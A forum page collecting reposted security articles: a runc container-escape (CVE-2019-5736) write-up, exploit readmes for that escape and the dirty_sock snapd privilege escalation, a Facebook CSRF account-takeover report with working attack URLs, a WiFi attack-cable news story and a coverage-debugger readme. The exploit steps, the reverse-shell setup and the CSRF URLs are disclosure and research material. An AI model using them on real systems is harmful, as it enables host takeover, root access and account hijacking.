Jump to content

Nytro

Administrators
  • Posts

    18727
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. Fingerprinting x86 CPUs using Illegal Opcodes Feb 8, 2019 • julian x86 CPUs usually identify themselves and their features using the cpuid instruction. But even without looking at their self-reported identities or timing behavior, it is possible to tell CPU microarchitectures apart. Take for example the ud0 instruction. This instruction is used to generate an Invalid Opcode Exception (#UD). It is encoded with the two bytes 0F FF. If we place this instruction at the end of an executable page in memory and the following page is not executable, we see differences across x86 microarchitectures. On my Goldmont Plus-based Intel NUC, executing this instruction will indeed cause an #UD exception. On Linux, this exception is delivered as SIGILL. If I retry the same setup on my Skylake desktop, the result is a SIGSEGV instead. This signal is caused by a page fault during instruction fetch. This means that the CPU did not manage to decode this instruction with just the two bytes and tried to fetch more bytes. My somewhat older Broadwell-based laptop has the same behavior. Using baresifter, we can reverse engineer (more on that in a future blog post) that Skylake and Broadwell actually try to decode ud0 as if it had source and destination operands. After the the two opcode bytes, they expect a ModR/M byte and as many additional immediate or displacement bytes as the ModR/M byte indicate. I have put the code for this example on Github. Why would this matter? Afterall, this behavior is now even documented in the Intel Software Developer’s Manual: Some older processors decode the UD0 instruction without a ModR/M byte. As a result, those processors would deliver an invalid-opcode exception instead of a fault on instruction fetch when the instruction with a ModR/M byte (and any implied bytes) would cross a page or segment boundary. I have picked an easy example for this post. Beyond this documented difference, there are many other undocumented differences in instruction fetch behavior for other illegal opcodes that makes it fairly easy to figure out what microarchitecture we are dealing with. This still applies when a hypervisor intercepts cpuid and changes the (virtual) CPU’s self-reported identity. It is also possible to fingerprint different x86 instruction decoding libraries using this approach and narrow down which hypervisor software stack is used. One usecase I can think of is to build malware that is tailored to recognize its target using instruction fetch fingerprinting. Let’s say the malware’s target is an embedded system with an ancient x86 CPU. If it is actively fingerprinting the CPU, it can avoid deploying its payload in an automated malware anlysis system and be discovered, unless the malware analysis is performed on the exact same type of system targeted by the malware. Sursa: https://x86.lol/generic/2019/02/08/fingerprint.html
  2. Wednesday, February 13, 2019 CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host Introduction The inspiration to the following research was a CTF task called namespaces by _tsuro from the 35C3 CTF. While solving this challenge we found out that creating namespace-based sandboxes which can then be joined by external processes is a pretty challenging task from a security standpoint. On our way back home from the CTF we found out that Docker, with its “docker exec” functionality (which is actually implemented by runc from opencontainers) follows a similar model and decided to challenge this implementation. Goal and results Our goal was to compromise the host environment from inside a Docker container running in the default or hardened configuration (e.g. limited capabilities and syscall availability). We considered the two following attack vectors: a malicious Docker image, a malicious process inside a container (e.g. a compromised Dockerized service running as root). Results: we have achieved full code execution on the host, with all capabilities (i.e. on the administrative ‘root’ access level), triggered by either: running “docker exec” from the host, on a compromised Docker container, starting a malicious Docker image. This vulnerability was assigned CVE-2019-5736 and was officially announced here. Default Docker security settings Despite Docker not being marketed as sandboxing software, its default setup is meant to secure host resources from being accessed by processes inside of a container. Although the initial process inside a Docker container is running as root, it has very limited privileges, which is achieved using several mechanisms (this paper describes it thoroughly): Linux capabilities http://man7.org/linux/man-pages/man7/capabilities.7.html Docker containers have a very limited set of capabilities by default, which makes a container root user de facto an unprivileged user. seccomp http://man7.org/linux/man-pages/man2/seccomp.2.html This mechanism blocks container’s processes from executing a subset of syscalls or filters their arguments (thus limiting its impact on the host environment.) namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html This mechanism allows to limit containerized processes’ access to the host filesystem, as well as it limits the visibility of processes across the host/container boundary. cgroups http://man7.org/linux/man-pages/man7/cgroups.7.html The control groups (cgroups) mechanism allows to limit and manage various types of resources (RAM, CPU, ...) of a group of processes. It’s possible to disable all of these mechanisms (for example by using the --privileged command-line option) or to specify any set of syscalls/capabilities/shared namespaces explicitly. Disabling those hardening mechanisms makes it possible to easily escape the container. Instead, we will be looking at Docker containers running the default security configuration. Failed approaches Before we ended up finding the final vulnerability we had tried many other ideas, most of which were mitigated by limited capabilities or by seccomp filters. As the whole research was a follow-up to a 35C3 CTF task, we started by investigating what happens when a new process gets started in an existing namespace (a.k.a. “docker exec”). The goal here was to check if we can access some host resources by obtaining them from the newly joined process. Specifically, we looked for ways to access that process from inside the container before it joins all used namespaces. Imagine the following scenario, where a process: joins the user and PID namespaces, forks (to actually join the PID namespace), joins the rest of the namespaces (mount, net etc.). If we could ptrace that process as soon as it visible to us (i.e. right as it joined the PID namespace), we could prevent it from joining the rest of the namespaces, which would in turn enable e.g. host filesystem access. Not having the required capabilities to ptrace could be bypassed by performing an unshare of the user namespace by the container init process (this yields the full set of capabilities in the new user namespace). Then “docker exec” would join our new namespace (obtained via “/proc/pid/ns/”) inside of which we can ptrace (but seccomp limitations would still apply). It turns out that runc joins all of the required namespaces and only forks after having done so, which prevents this attack vector. Additionally, the default Docker configuration also disables all namespace related syscalls within the container (setns, unshare etc.). Next we focused solely on the proc filesystem (more info: proc(5)) as it’s quite special and can often cross namespace boundaries. The most interesting entries are: /proc/pid/mem - This doesn’t give us much by itself, as the target process needs to already be in the same PID namespace as malicious one. The same applies to ptrace(2). /proc/pid/cwd, /proc/pid/root - Before a process fully joins a container (after it joins namespaces but before it updates its root (chroot) and cwd (chdir)) these point to the host filesystem, which could possibly allow us to access it - but since the runc process is not dumpable (read more: http://man7.org/linux/man-pages/man2/ptrace.2.html), we cannot use those. /proc/pid/exe - Not of any use just by itself (same reason as cwd and root), but we have found a way around that and used it in the final exploit (described below). /proc/pid/fd/ - Some file descriptors may be leaked from ancestor namespaces (especially the mount namespace) or we could disturb parent - child (actually grandchild) communication in runc - we have found nothing of particular interest here as synchronisation was done with local sockets (can’t reuse those). /proc/pid/map_files/ - A very interesting vector - before runc executes the target binary (but after the process is visible to us, i.e. it joined the PID namespace) all the entries refer to binaries from the host filesystem (since that is there where the process was originally spawned). Unfortunately, we discovered that we cannot follow these links without the SYS_ADMIN capability (source) - even from within the same process. Side note: When executing the following command: /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /bin/ls -al /proc/self/exe “/proc/self/exe” points to “ld-linux-x86-64.so.2” (not “/bin/ls”, as one might think) The attack idea was to force “docker exec” to use dynamic loader from host to execute binary inside container (by replacing original target to exec (e.g. “/bin/bash”) with a text file with the first line: #!/proc/self/map_files/address-in-memory-of-ld.so) /evil_binary Then /evil_binary could overwrite /proc/self/exe and thus overwrite the host ld.so. This approach was unsuccessful due to the aforementioned SYS_ADMIN capability requirement. Side note 2: While experimenting with the above we found a deadlock in the kernel: when a regular process tries to execve “/proc/self/map_files/any-existing-entry”, it will deadlock (and then opening “/proc/that-process-pid/maps” from any other process will also hang - probably some lock taken). Successful approach The final successful attempts involved an approach very similar to the aforementioned idea with /proc/self/map_files - we execute /proc/self/exe, which is the host's docker-runc binary, while still being able to inject some code (we did that by changing some shared library, like libc.so, to also execute our code e.g. inside libc_start_main or global constructor). This gives us ability to overwrite /proc/self/exe binary which is the docker-runc binary from the host, which in turn gives us full capabilities root access on host next time docker-runc is executed. Detailed attack description: Craft a rogue image or compromise a running container: Make the entrypoint binary (or any binary that is likely to be runtime overridden by the user as the entrypoint, or as part of docker exec) be a symlink to /proc/self/exe Replace any dynamic library used by docker-runc with a custom .so that has an additional global constructor. This function opens /proc/self/exe (which points to the host docker-run) for reading (it is impossible to open it for writing, since the binary is being executed right now, see ETXTBSY in open(2)). Then this function executes another binary which opens, this time for write, /proc/self/fd/3 (a file descriptor of docker-runc opened before execve), which succeeds because docker-runc is no longer being executed. The code can then overwrite the host docker-runc with anything - we have chosen a fake docker-runc with an additional global constructor that runs arbitrary code. Thus, when a host user runs the compromised image or “docker exec” on a compromised container : The entrypoint/exec binary that has been symlinked to /proc/self/exe (which in turn points to docker-runc on the host filesystem) begins executing within the container (this will also cause process to be dumpable, as execve sets the dumpable flag). To be clear: this causes the original docker-runc process to re-execute into a new docker-runc running within the container (but using the host binary). When docker-runc begins executing for the second time, it will load .so files from the container, not the host (because this is the visible filesystem now). As a reminder: we control the content of these dynamic libraries. The malicious global constructor function will be executed. It will open /proc/self/exe for reading (let’s say it will have file descriptor 3) and execve()s some attacker controlled binary (let’s say /evil). /evil will overwrite docker-runc on the host filesystem (by reopening fd 3, this time with write access) with a backdoored/malicious docker-runc (e.g. with an additional global constructor). Now when any container is started or another exec is done, the attacker’s fake docker-runc will be executed as root with full capabilities on host filesystem (this binary is responsible for dropping privileges and entering namespaces, so initially it has full permissions). Note that this attack only abuses runc (opencontainers) behavior, so it should work for kubernetes as well, regardless of whether it uses docker or cri-o (both may use runc internally). This attack has serious impact on AWS and GCP cloud services. More information about it can be found at linked security bulletins. Responsible disclosure We have reported the vulnerability to security@docker.com the same day we discovered it, including a detailed attack description and a proof of concept exploit. The next day the Docker security team forwarded our email to security@opencontainers.org. We also actively participated in discussions regarding fixing the vulnerability. Communicating with the Docker and OpenContainers security teams was frictionless and pleasant.. Rejected fix ideas in runc Open the destination binary and compare inode info from fstat(2) with /proc/self/exe and exit if they match, otherwise execveat on destination binary fd. This would detect if destination binary is a symlink to /proc/self/exe. Why execveat? Because we want to avoid the race condition where between comparison at exec some other process will replace destination binary with link to /proc/self/exe. Why wouldn’t this work? This can be bypassed when attacker will not use symlink, but a binary with dynamic loader pointing to “/proc/self/exe”: e.g. text file which has “#!/proc/self/exe” as first line or just an elf file. Use a static binary to launch processes within the container The idea of this is to avoid code execution possibility via malicious .so files inside the container (a static binary means no .so files are loaded). Why wouldn’t this work? Replacing .so files was not actually needed for this exploit. After the re-exec of /proc/self/exe (docker-runc), another process can just open /proc/<pid-of-docker-runc>/exe, which is possible because ”dumpable” flag is set on execve. This is a little bit harder to exploit because it requires to race the timing between the re-exec completing and runc process exiting (due to no parameters given). In practice, the race window is so large that we were able to develop a 100% successful exploit for such a scenario. However this would eliminate one of the attack vectors: running a rogue image. Final fix applied in runc In the end, the following fix was applied to mitigate the vulnerability: : Create a memfd (a special file which exists only in memory). Copy the original runc binary to this fd. Before entering namespaces re-exec runc from this fd. This fix guarantees that if the attacker overwrites the binary pointed to by /proc/self/exe then it will not cause any damage to the host because it’s a copy of the host binary, stored entirely in memory (tmpfs). Mitigations There are several mitigation possibilities when using an unpatched runc: Use Docker containers with SELinux enabled (--selinux-enabled). This prevents processes inside the container from overwriting the host docker-runc binary. Use read-only file system on the host, at least for storing the docker-runc binary. Use a low privileged user inside the container or a new user namespace with uid 0 mapped to that user (then that user should not have write access to runc binary on the host). Timeline 1 January 2019 - Vulnerability discovered and PoC created 1 January - Vulnerability reported to security@docker.com 2 January - Report forwarded by docker security team to security@opencontainers.org 3 - 5 January - Discussion about fix ideas 11 February - end of CVE-2019-5736 embargo 13 February - this post publication Authors: Adam Iwaniuk, Borys Popławski Posted by Adam Iwaniuk at 00:42 Sursa: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
  3. # Usage Edit HOST inside `payload.c`, compile with `make`. Start `nc` and run `pwn.sh` inside the container. # Notes - This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the payload. It'll also overwrite `/bin/sh` inside the container. - Tested only on Debian 9. - No attempts were made to make it stable or reliable, it's only tested to work when a `docker exec <id> /bin/sh` is issued on the host. More complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d). Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip Sursa: https://www.exploit-db.com/exploits/46359
  4. # dirty_sock: Privilege Escalation in Ubuntu (via snapd) In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>. You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe. ``` $ snap version ... snapd 2.37.1 ... ``` # Usage ## Version One (use in most cases) This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value. Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost. To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded): ``` python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa" [+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0; [+] Binding to socket file... [+] Connecting to snapd API... [+] Sending payload... [+] Success! Enjoy your new account with sudo rights! [Script will automatically ssh to localhost with the SSH key here] ``` ## Version Two (use in special cases) This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time. dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands. As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments. This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax. Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details. To exploit, simply run the script with no arguments on a vulnerable system. ``` python3 ./dirty_sockv2.py [+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0; [+] Binding to socket file... [+] Connecting to snapd API... [+] Deleting trojan snap (and sleeping 5 seconds)... [+] Installing the trojan snap (and sleeping 8 seconds)... [+] Deleting trojan snap (and sleeping 5 seconds)... ******************** Success! You can now `su` to the following account and use sudo: username: dirty_sock password: dirty_sock ******************** ``` # Troubleshooting If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable. Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost). Please open issues for anything weird. # Disclosure Info The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>. I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself. Public advisory links: - https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing - https://usn.ubuntu.com/3887-1/ Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46360.zip Sursa: https://www.exploit-db.com/exploits/46360
  5. Posted on February 12, 2019 by qw Facebook CSRF protection bypass which leads to Account Takeover. This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link. Demonstration This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and make a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain www.facebook.com which makes it easier for the attacker to trick his victims to visit the URL. The vulnerable endpoint is: https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body). This allowed me to make many actions if the victim visits this URLs. Some of these are: Make a post on timeline: https://www.facebook.com/comet/dialog_DONOTUSE/?url= /api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}} Delete Profile Picture: https://www.facebook.com/comet/dialog_DONOTUSE/? url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID} Trick user to delete their account (After changing language with “locale” parameter) https://www.facebook.com/comet/dialog_DONOTUSE/? url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR This will promote a password confirmation dialog, if the victim enters his password then his account will be deleted. Account Takeover Approach To takeover the account, we have to add a new email address or phone number to the victim account. The problem here is that the victim has to visit two separate URLs , one to add the email/phone and one to confirm it because the “normal” endpoints used to add emails or phone numbers don’t have a “next” parameter to redirect the user after a successful request. So to bypass this, i needed to find endpoints where the “next” parameter is present so the account takeover could be made with a single URL. 1) We authorize the attacker app as the user then we redirect to https://www.facebook.com/v3.2/dialog/oauthwhich will automatically redirect to the attacker website with access_token having the scopes allowed to that app (this happens without user interaction because the app is already authorized using the endpoint /ajax/appcenter/redirect_to_app). This URL should be sent to the user: https://www.facebook.com/comet/dialog_DONOTUSE/?url= /ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog This step is needed for multiple things: First to use the endpoint /v3.2/dialog/oauth to bypass Facebook redirect protection in the “next” parameter which blocks redirecting attempts to external websites even if they are made using linkshim. Second to identify each victim using the token received which will help later to extract the confirmation code for that specific user. 2)The attacker website receives the access token of the user , creates an email for him under that domain and redirect the user to : https://www.facebook.com/comet/dialog_DONOTUSE/? url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next= /v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK] This URL does the follow: First it links an email to the user account using the endpoint /add_contactpoint/dialog/submit/ (no password confirmation is required). After the linking, it redirects to the selected endpoint in “next” paramter: "/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}" which will redirect to the “ATTACKER_DOMAIN” again with the user access_token. 3) The attacker website receives the “access_token”, extract the user ID then search for the email received for that user and gets the confirmation link then redirects again to : https://www.facebook.com/confirmcontact.php?c={CODE}&z=0&gfid={HASH} (CODE and HASH are in the email received from Facebook) This method is simpler for the attacker but after the linking the endpoint redirects the victim to https://www.facebook.com/settings?section=email which expose the newly added email so the confirmation could be done using the /confirm_code/dialog/submit/ endpoint which have a “next” parameter that could redirect the victim to the home page after the confirmation is made. 4) The email is now added to the victim account, the attacker could reset the password and takeover the account. The attack seems long but it’s done in a blink of an eye and it’s dangerous because it doesn’t target a specific user but anyone who visits the link in step 1 (This is done with simple scripts hosted in the attacker website) Timeline Jan 26, 2018 — Report Sent Jan 26, 2018 —  Acknowledged by Facebook Jan 28, 2018 —  More details sent Jan 31, 2018 — Fixed by Facebook Feb 12, 2018 — $25,000  Bounty Awarded by Facebook Sursa: https://ysamm.com/?p=185
  6. New Offensive USB Cable Allows Remote Attacks over WiFi By Lawrence Abrams February 11, 2019 12:27 PM Like a scene from a James Bond or Mission Impossible movie, a new offensive USB cable plugged into a computer could allow attackers to execute commands over WiFi as if they were using the computer's keyboard. When plugged into a Linux, Mac, or Windows computer, this cable is detected by the operating system as a HID or human interface device. As HID devices are considered input devices by an operating system, they can be used to input commands as if they are being typed on a keyboard. Created by security researcher Mike Grover, who goes by the alias _MG_, the cable includes an integrated WiFi PCB that was created by the researcher. This WiFi chip allows an attacker to connect to the cable remotely to execute command on the computer or manipulate the mouse cursor. PCB with Embedded WiFi Chip In a video demonstration by Grover, you can see how the researcher simply plugs a cable into the a PC and is able to connect to it remotely to issue commands through an app on his mobile phone. In an interview with BleepingComputer, Grover explained that when plugged in, the cable is seen as a keyboard and a mouse. This means an attacker can input commands regardless of whether the device is locked or not. Even scarier, if the computer normally locks a session using an inactivity timer, the cable can be configured to simulate user interaction to prevent this. "It “works” just like any keyboard and mouse would at a lock screen, which means you can type and move the mouse," Grover told BleepingComputer. "Therefore, if you get access to the password you can unlock the device. Also, if the target relies on an inactivity timer to auto lock the machine, then it’s easy to use this cable to keep the lock from initiating by simulating user activity that the user would not notice otherwise (tiny mouse movements, etc)." Grover further told BleepingComputer that these WiFi chips can be preconfigured to connect to a WiFi network and potentially open reverse shells to a remote computer. This could allow attackers in remote locations to execute commands to grant further visibility to the computer when not in the vicinity of the cable. The app that issues commands to the O·MG cable is being developed collaboratively according to blog post by Grover. The developers hope to port the ESPloitV2 tool for use in the cable. WiFi deuthentication attacks may also be possible While the HID attack can be prevented using a USB condom, which prevents data transmission between the cable and the computer, Grover told BleepingComputer that it could still be used for WiFi deauthentication attacks. WiFi deauth attacks are used to disconnect nearby wireless devices from an access point by sending deauthentication frames from spoofed MAC addresses. Grover envisions that a deauth attack can be used in scenarios where the attacker does not have access to a location to perform an attack, but the victim's plugged in cable does. This could allow a remote attacker to create a physical diversion while allowing another remote attack that may have been noticed to slip by. As an example, Grover illustrated the following scenario. "You aren’t in range of a wireless target, but the target person is. Using this cable, you can get them to carry the attack hardware inside a controlled area. Maybe to disrupt a camera? Maybe a fun disruption/diversion for another attack. (Imagine distributing a dozen inside an office and suddenly IT/Sec is focused on the chaos)." Researcher hopes to sell the cable This cable is not currently for sale, but Grover hopes to sell it to other security researchers in the future. Grover told BleepingComputer that he has spent approximately $4,000 over 300 hours of research into creating the needed WiFi PCBs and adding them to the cable. This was done using a desktop mill, which is typically not used to create high quality PCBs in a DIY environment. Due to this, many users were surprised by the quality of Grover's chips and Bantam, the manufacturer of the mill, reached out to learn how the researcher was able to do it. PCBs printed in various colors by Grover Before selling the cables, the researcher still wants to make more changes before sending it off for production. Sursa: https://www.bleepingcomputer.com/news/security/new-offensive-usb-cable-allows-remote-attacks-over-wifi/#.XGG_FsgLNm8.twitter
  7. Summary Mesos is a tool to gather binary code coverage on all user-land Windows targets without need for source or recompilation. It also provides an automatic mechanism to save a full minidump of a process if it crashes under mesos. Mesos is technically just a really fast debugger, capable of handling tens of millions of breakpoints. Using this debugger, we apply breakpoints to every single basic block in a program. These breakpoints are removed as they are hit. Thus, mesos converges to 0-cost coverage as gathering coverage only has a cost the first time the basic block is hit. Why? This is effectively the successor of my 5+ year old Chrome IPC fuzzer. It doesn't have any fuzz components in it, but it is a high-performance debugger. This debugger can apply millions of breakpoints to gather coverage, and handle thousands of breakpoints per second to modify memory to inject inputs. This strategy has worked out well for me historically and still is my go-to tooling for fuzzing targets on live systems. Out of the box it can be used to gather simple code coverage but it's designed to be easily modified to add fast breakpoint handlers to inject inputs. For example, put a breakpoint after NtReadFile() returns and modify the buffer in flight. I used this in Chrome to modify inbound IPC traffic in the browser. Features Code coverage Automatic full minidump saving IDA Coloring Quick Usage Guide Set %PATH% such that idat64.exe is in it: path %PATH%;"C:\Program Files\IDA 7.2" Generate mesos (the first time will be slow): powershell .\offline_meso.ps1 <pid> python generate_mesos.py process_ida Gather coverage on target! cargo build --release target\release\mesos.exe <pid> Applying 1.6 million breakpoints? No big deal. C:\dev\mesos>target\release\mesos.exe 13828 mesos is 64-bit: true target is 64-bit: true [ 0.003783] Applied 5629 breakpoints ( 5629 total breakpoints) notepad.exe [ 0.028071] Applied 61334 breakpoints ( 66963 total breakpoints) ntdll.dll [ 0.035298] Applied 25289 breakpoints ( 92252 total breakpoints) kernel32.dll [ 0.058815] Applied 55611 breakpoints ( 147863 total breakpoints) kernelbase.dll ... [ 0.667417] Applied 11504 breakpoints ( 1466344 total breakpoints) oleacc.dll [ 0.676151] Applied 19557 breakpoints ( 1485901 total breakpoints) textinputframework.dll [ 0.705431] Applied 66650 breakpoints ( 1552551 total breakpoints) coreuicomponents.dll [ 0.717276] Applied 25202 breakpoints ( 1577753 total breakpoints) coremessaging.dll [ 0.720487] Applied 7557 breakpoints ( 1585310 total breakpoints) ntmarta.dll [ 0.732045] Applied 28569 breakpoints ( 1613879 total breakpoints) iertutil.dll Usage To use mesos there are 3 major steps. First, the modules of a running process are saved. Second, these modules are loaded in IDA which then outputs a list of all basic blocks into the meso format. And finally, mesos is run against a target process to gather coverage! Creating meso_deps.zip This step is the first thing we have to do. We create a ZIP file containing all of the modules loaded into a given PID. This script requires no internet and is designed to be easily dropped onto new VMs so mesos can be generated for your target application. It depends on PowerShell v5.0 or later which is installed by default on Windows 10 and Windows Server 2016. Run, with <pid> replaced with the process ID you want to gather coverage on: C:\dev\mesos>powershell .\offline_meso.ps1 8484 Powershell is 64-bit: True Target is 64-bit: True C:\dev\mesos> Optionally you can supply -OutputZip <zipfile> to change the output zip file name This will create a meso_deps.zip that if you look at contains all of the modules used in the process you ran the script targeting. Example output: C:\dev\mesos>powershell .\offline_meso.ps1 8484 -OutputZip testing.zip Powershell is 64-bit: True Target is 64-bit: True C:\dev\mesos>powershell Expand-Archive testing.zip -DestinationPath example C:\dev\mesos>powershell Get-ChildItem example -rec -File -Name cache\c_\program files\common files\microsoft shared\ink\tiptsf.dll cache\c_\program files\intel\optaneshellextensions\iastorafsserviceapi.dll cache\c_\program files\widcomm\bluetooth software\btmmhook.dll cache\c_\program files (x86)\common files\adobe\coresyncextension\coresync_x64.dll ... Generating meso files To generate meso files we operate on the meso_deps.zip we created in the last step. It doesn't matter where this zip came from. This allows the zip to have come from a VM that the PowerShell script was run on. Basic usage is: python generate_mesos.py process_ida This will use the meso_deps.zip file as an input, and use IDA to process all executables in the zip file and figure out where their basic blocks are. This will create a cache folder with a bunch of files in it. These files are named based on the module name, the modules TimeDateStamp in the PE header, and the ImageSize field in the PE header. This is what DLLs are uniqued by in the PDB symbol store, so it should be good enough for us here too. You'll see there are files with no extension (these are the original binaries), there are files with .meso extensions (the breakpoint lists), and .i64 files (the cached IDA database for the original binary). Symbol resolution There is no limitation on what can make these meso files. The quality of the symbol resolution depends on the tool you used to generate and it's ability to resolve symbols. For example with IDA if you have public/private symbols your _NT_SYMBOL_PATH should be configured correctly. More advanced usage Check the programs usage for the most recent usage. But there are _whitelist and _blacklist options that allow you to use a list of strings to filter the amount of mesos generated. This is helpful as coverage outside of your target module is probably not relevant and just introduces overheads and unnecessary processing. C:\dev\mesos>python generate_mesos.py Usage: generate_mesos.py process_ida Processes all files in the meso_deps.zip file generate_mesos.py process_ida_whitelist <str 1> <str 2> <str ...> Processes files only containing one of the strings provided generate_mesos.py process_ida_blacklist <str 1> <str 2> <str ...> Processes files all files except for those containing one of the provided strings Examples: python generate_mesos.py process_ida_whitelist system32 Only processes files in `system32` python generate_mesos.py process_ida_blacklist ntdll.dll Process all files except for `ntdll.dll` Path requirements for process_ida_*: must have `idat64.exe` in your PATH Example usage C:\dev\mesos>python generate_mesos.py process_ida_whitelist system32 Processing cache/c_/windows/system32/advapi32.dll Processing cache/c_/windows/system32/bcryptprimitives.dll Processing cache/c_/windows/system32/cfgmgr32.dll ... Processing cache/c_/windows/system32/user32.dll Processing cache/c_/windows/system32/uxtheme.dll Processing cache/c_/windows/system32/win32u.dll Processing cache/c_/windows/system32/windows.storage.dll Processing cache/c_/windows/system32/wintypes.dll Meso usage Now we're onto the actual debugger. We've created meso files to tell it where to put breakpoints in each module. First we need to build it with Rust! cargo build --release And then we can simply run it with a PID! target\release\mesos.exe <pid> Command-line options Currently there are few options to mesos, run mesos without arguments to get the most recent list. C:\dev\mesos>target\release\mesos.exe Usage: mesos.exe <pid> [--freq | --verbose | --print] <explicit meso file 1> <explicit meso file ...> --freq - Treats all breakpoints as frequency breakpoints --verbose - Enables verbose prints for debugging --print - Prints breakpoint info on every single breakpoint [explicit meso file] - Load a specific meso file regardless of loaded modules Standard usage: mesos.exe <pid> Example usage C:\dev\mesos>target\release\mesos.exe 13828 mesos is 64-bit: true target is 64-bit: true [ 0.004033] Applied 5629 breakpoints ( 5629 total breakpoints) notepad.exe [ 0.029248] Applied 61334 breakpoints ( 66963 total breakpoints) ntdll.dll [ 0.037032] Applied 25289 breakpoints ( 92252 total breakpoints) kernel32.dll [ 0.062844] Applied 55611 breakpoints ( 147863 total breakpoints) kernelbase.dll ... [ 0.739059] Applied 66650 breakpoints ( 1552551 total breakpoints) coreuicomponents.dll [ 0.750266] Applied 25202 breakpoints ( 1577753 total breakpoints) coremessaging.dll [ 0.754485] Applied 7557 breakpoints ( 1585310 total breakpoints) ntmarta.dll [ 0.766119] Applied 28569 breakpoints ( 1613879 total breakpoints) iertutil.dll ... [ 23.544097] Removed 5968 breakpoints in imm32.dll [ 23.551529] Syncing code coverage database... [ 23.675103] Sync complete (169694 total unique coverage entries) Detached from process 13828 Why not use cargo run? When running in cargo run the Ctrl+C handler does not work correctly, and does not allow us to detach from the target program cleanly. Limitations Since this relies on a tool (IDA) to identify blocks, if the tool incorrectly identifies a block it could result in us inserting a breakpoint over data. Further it's possible to miss coverage if a block is not correctly found. Why doesn't it do more? Well. It really just allows fast breakpoints. Feel free to rip it apart and add your own hooks to functions. It could easily be used to fuzz things Why IDA? I tried a bunch of tools and IDA was the only one that seemed to work well. Binja probably would also work well but I don't have it installed and I'm not familiar with the API. I have a coworker who wrote a plugin for it and that'll probably get pull requested in soon. The meso files are just simple files, anyone can generate them from any tool Technical Details Minidump autogenned filenames The generated minidump filenames are designed to give a high-level of glance value at crashes. It includes things like the exception type, faulting address, and rough classification of the bug. Currently if it's an access violation we apply the following classification: Determine the access type (read, write, execute) For reads the filename contains: "read" For writes the filename contains: "WRITE" For execute the filename contains: "DEP" Determine if it's a non-canonical 64-bit address For non-canonical addresses the filename contains: NONCANON Otherwise determine if it's a NULL dereference (within 32 KiB +- of NULL) Will put "null" in the filename Otherwise it's considered a non-null deref and "HIGH" appears in the filename It's intended that more severe things are in all caps to give higher glance value of prioritizing which crash dumps to look into more. Example minidump filename for chrome: 